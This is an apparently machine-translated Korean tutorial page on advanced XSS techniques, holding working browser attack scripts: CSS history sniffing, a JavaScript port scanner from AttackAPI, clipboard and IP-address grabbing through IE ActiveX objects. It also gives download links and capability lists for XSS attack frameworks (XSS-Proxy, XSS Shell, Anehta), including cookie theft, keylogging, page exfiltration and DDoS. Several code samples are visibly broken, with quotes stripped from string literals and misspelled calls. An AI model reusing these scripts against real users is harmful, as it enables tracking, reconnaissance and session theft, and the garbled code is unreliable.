XSS 테마 2 XSS 향상

1.JavaScript/CSS history hack

<html>

<body>
<h3> Visited </h3>
<ul id="visited"> </ul>
<h3> Not Visited </h3>
<ul id="notvisited"> </ul>

<script>
var websites=[
"http://www.baidu.com/"
];
for(var i=0; i < websites.length;i++){
    var link=document.createElement("a");
    link.id="id"+i;
    link.href=websites[i];
    link.innerHTML=websites[i];
    document.write('<style>');
    document.write('#id'+i+":visited {color:#FF0000;}");
    document.write('</style>');
    document.body.appendChild(link);
    var color=document.defaultView.getComputedStyle(link,null).getPropertValue("color");
    document.body.removeChild(link);
    if(color == "rgb(255,0,0)"){
      var item=document.createElement('li');
      item.appendChild(link);
      document.getElementById('visited').appendChild(item);
    }else
    {
      var item=document.createElement('li');
      item.appendChild(link);
      document.getElementById('notvisited').appendChild(item);
    }
}
</script>
</body>

</html>

2.JavaScript 포트 스 캔 실현

<html>

<body>
<form>
<label for="target">target</label><br/>
<input type="text" name="target" value="
www.gnucitizen.org"/><br/>
<label for="port">port</label><br/>
<input type="text" name="port" value="80"/><br/>
<p>you can use sequence as well 80,81,8080</p>
<label for="timeout">timeout</label><br/>
<input type="text" name="timeout" value="1000"/><br/>
<label for="result">result</label><br/>
<textarea id="result" name="result" rows="7" cols="50"></textarea><br/>
<input class="button" type="button" value="scan" onClick="javascript:scan(this.form)"/>
</form>

<script>
var AttackAPI = {
    version: 0.1,
    author: Petko Petkov (architect),
    homepage: http://www.gnucitizen.org};

AttackAPI.PortScanner = {};
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
    var timeout = (timeout == null)?100:timeout;
    var img = new Image();
   
    img.onerror = function () {
        if (!img) return;
        img = undefined;
        callback(target, port, open);
    };
   
    img.onload = img.onerror;
    img.src = http:// + target + : + port;
   
    setTimeout(function () {
        if (!img) return;
        img = undefined;
        callback(target, port, closed);
    }, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
{
    for (index = 0; index < ports.length; index++)
        AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);
};
</script>
<script>
var result = document.getElementById(result);
var callback = function (target, port, status) {
    result.value += target + : + port + + status + " ";
};
var scan = function (form) {
    AttackAPI.PortScanner.scanTarget(callback, form.target.value, form.port.value.split(,), form.timeout.value);
};
</script>
</body>
</html>

3.자 바스 크 립 트 클립보드 내용 보기
IE 에 유효 하지 않 습 니 다.Firefox 는 유효 하지 않 습 니 다.

<html>

<body>
<form action="test.php" method="post" id="test">
    <div id="someData">
        <textarea cols="40" rows="4" name="test">
        </textarea>
    </div>
    <input type="button" value="copy to clipboard" onclick="setClipboard()">
    <input type="button" value="look clipboard" onclick="readClipboard()">
    <input type="button" value="clear clipboard" onclick="window.clipboardData.clearData('text');">
</form>
<script>
function readClipboard(){
    alert(window.clipboardData.getData('Text'));
}
function setClipboard(){
    var t=document.getElementById("someData").innerText;
    window.clipboardData.setData('text',t);
}
</script>
</body>
</html>

4.내부 네트워크 IP 주소 가 져 오기

<html>

<body>
<script>
function GetLocalIP(){
    var obj=null;
    var rslt="";
    try
    {
        obj=new ActiveXObject("rcbdyctl.Setting");
        rslt=obj.GetIPAddress;
        obj=null;
    }
    catch(e)
    {}
    return rslt;
}
document.write("Your IP is : "+GetLocalIP())
</script>
</body>
</html>

5.외부 네트워크 IP 주소 가 져 오기

<html>
<body>
<script>
    xml=new ActiveXObject("Microsoft.XMLHTTP");
    xml.open("GET","http://www.ip138.com/ip2city.asp",fasle);
    xml.send();
    kk=xml.ResponseText;
    i=kk.indexOf("[");
    ie=kk.indexOf("]");
    ip=kk.substring(i+1,ie);
    document.write("Your IP :"+ip);
</script>
</body>
</html>

홈 페이지

<html>
<body>
<script>
    document.write("<iframe src=http://www.baidu.com width=100% height=100% ></iframe>")
</script>
</body>
</html>

7.Fiddler
Fiddler 는 가장 강력 한 웹 디 버 깅 도구 중 하나 입 니 다.모든 클 라 이언 트 와 서버 의 http 와 https 요청 을 기록 할 수 있 습 니 다.감시,정지점 설정,심지어 입 출력 데 이 터 를 수정 할 수 있 습 니 다.Fiddler 를 사용 하 는 것 은 개발 이나 테스트 에 큰 도움 이 됩 니 다.
8.XSS-프 록 시
http://xss-proxy.sourceforge.net/
코드 수정server 와 serverport 두 개의 인자,codeserver 는 로 컬 xss-proxy server 서버 도 메 인 입 니 다.
xss2.js 에 대하 여
（1）showDoc()
  이 함수 의 기능 은 현재 사용자 브 라 우 저 창의 내용 을 iframe 에 불 러 온 다음 에 iframe 의 내용 을 2048 바이트(URL 길이 제한)이상 의 url 로 변환 하고 이 url 을 xss-proxy 요청 으로 하 는 것 입 니 다.
（2）scriptRequest()
        12 초 에 한 번 씩 실행 되 며 xss-proxy server 와 의 상호작용 에 사 용 됩 니 다.자바 script evaluate results 를 포함 합 니 다.
（3）reportError()
        Dom 대상 접근 오류 등 오류 정 보 를 보고 합 니 다.
9.XSS Shell
XSS Shell 은 windows 환경 에서 XSS 공격 플랫폼 입 니 다.다운로드 주소:http://www.portcullis-security.com/tools/free/XSSShell039.zip XSS 셸 을 이용 하면 공격 자 는 XSS 구멍 이 있 는 사이트 의 사용 자 를 쉽게 공격 할 수 있다.현재 실시 할 수 있 는 공격 은 다음 과 같 지만 이에 국한 되 지 않 습 니 다.1.사용자 쿠키 를 가 져 옵 니 다.2.사용자 의 현재 페이지 내용 가 져 오기;3.팝 업 창;4.JS 코드 실행 하기;5.사용자 와 대화 하 는 창 팝 업;6.키보드 로그 가 져 오기(테스트 중 성공 하지 못 함);7.마우스 로그 가 져 오기(테스트 중 성공 하지 못 함);8.클립보드 가 져 오기(IE 만 가능);9.내부 IP 가 져 오기(Mozilla*+JVM 만 지원)10.사용자 탐색 기록 가 져 오기;11.피해자 자격 증명(현재 알 수 없 음)12,DDoS 로 요청 하기;13.사용자 컴퓨터 CPU 자원 을 소 진 합 니 다.
http://labs.portcullis.co.uk/tools/xss-shell/ 다운로드 지점
10.AttackAPI
   자 바스 크 립 트 프레임 워 크
다운로드 주소http://www.gnucitizen.org/blog/attackapi/
http://code.google.com/p/attackapi/
1.현재 설 치 된 Firefox 확장 자 를 추출 하고 검색
2.사용자 가 사이트 에 로그 인 했 는 지 확인 합 니 다.
3.클 라 이언 트 탐색 기록 검색
 혹은
Anehta XSS 이용 도구 는
http://code.google.com/p/anehta/downloads/list